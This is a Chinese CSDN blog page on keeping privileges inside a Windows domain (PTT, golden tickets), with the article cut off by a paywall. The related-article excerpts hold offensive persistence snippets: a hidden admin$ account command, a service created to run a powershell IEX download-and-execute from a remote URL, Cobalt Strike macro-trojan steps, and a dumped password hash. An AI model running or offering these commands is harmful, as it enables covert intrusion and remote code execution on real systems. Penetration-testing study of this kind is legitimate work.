内网渗透-域内的权限维持

已于 2023-01-20 00:44:14 修改
阅读量958 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-10-01 01:23:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/127113346
版权

域内的权限维持

文章目录

前言

上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。

PTT

PTT(票据)
window认证机制
http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE4AB98F4937

TGT(黄金票据)

(1)TGT(黄金票据)
黄金票

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
内网渗透之windows权限维持
07-18
windows的进程查看器(dll)
内网渗透-windows权限维持的方法
最新发布
lza20001103的博客
04-14 980
内网渗透-windows权限维持的方法
内网渗透渗透.pdf
08-07
目录 工作组& 的渗透姿势 MS14-068 致谢
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
第70天:内网安全-横向内网漫游Socks代理隧道技术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
权限维持新老技术
热门推荐
Shanfenglan's blog
08-04 34万+
参考资料 权限维持相关 静默宏木马 可以使用静默宏木马进行权限维持。利用cs创建宏木马插入docx文件中。 制作方法 1.利用CS生成vbs代码 2.创建一个docx文档并创建宏且将宏的位置设置为对所有的活动模版和文档,如下图所示 3.将恶意vbs代码加入到Nomal的This Document模块 4.保存文件并运行,主机上线,且以后这个电脑上的任意word文档打开后都会上线,除非删掉这个宏配置。 tips 杀软对doc文件杀软查杀力度远大于对docx文件的。 参考 静默宏木马进行
Windows权限维持技术总结、复现
leah126的博客
03-13 770
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
CS插件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 1285
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视化操作(强烈建议使用白名单进程进行操作)。
【渗透测试笔记】之【内网渗透——CS权限维持CS上线后进程自迁移插件】
AA8j的博客
10-25 2715
1. 服务端加载malleable配置文件 1.1 下载 下载地址:https://github.com/threatexpress/malleable-c2 下载cs对应版本配置文件: 我这里下载4.3版本的。 1.2 加载配置文件 下载完后放入CS根目录: 加载配置文件启动方式,只需要在末尾跟上配置文件就可以了: ./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile 2. 客户端加载cna插件 2.1 插件下载 下载地址:https://git
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 823
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集...
ISC-内网渗透 -最终版.pdf
04-08
ISC-内网渗透 -最终版
kali linux权限维持,msfconsole权限维持
weixin_30481539的博客
04-29 598
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
MAC钓鱼并Root权限上线CS权限维持,以及所有的坑如何解决
qq_50854662的博客
08-17 1049
MAC钓鱼并Root权限上线CS权限维持,以及所有的坑如何解决
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4313
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
Windows远控之权限维持
Azjj
11-23 1175
Windows权限维持 一丶建立系统服务 获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。 1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。 sc create "nuoyan" binpath= "c:\accc.exe" sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/
内网权限维持
m0_55751267的博客
11-22 1112
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限的后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
权限维持简单总结
Aiwin的博客
08-17 3878
权限维持简单总结
利用SID History建立隐蔽后门
yy
03-02 236
SID History是一个支持迁移方案的属性,使得一个账户的访问权限可以有效的克隆到另外一个账户,这在迁移过程中非常有效。例如,当Domain A中的用户迁移到Domain B时,会在Domain B中创建一个新的用户账户,并将Domain A用户的SID添加到Domain B的用户账户的SID History属性中。在实战中,红队人员可以将管理员用户的SID添加到其他用户的SID History属性中,以此建立一个隐蔽的后门。通过powershell查看yuwin7用户的属性。
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的名字段来传输数据。 在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内网主机。内网主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境中可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值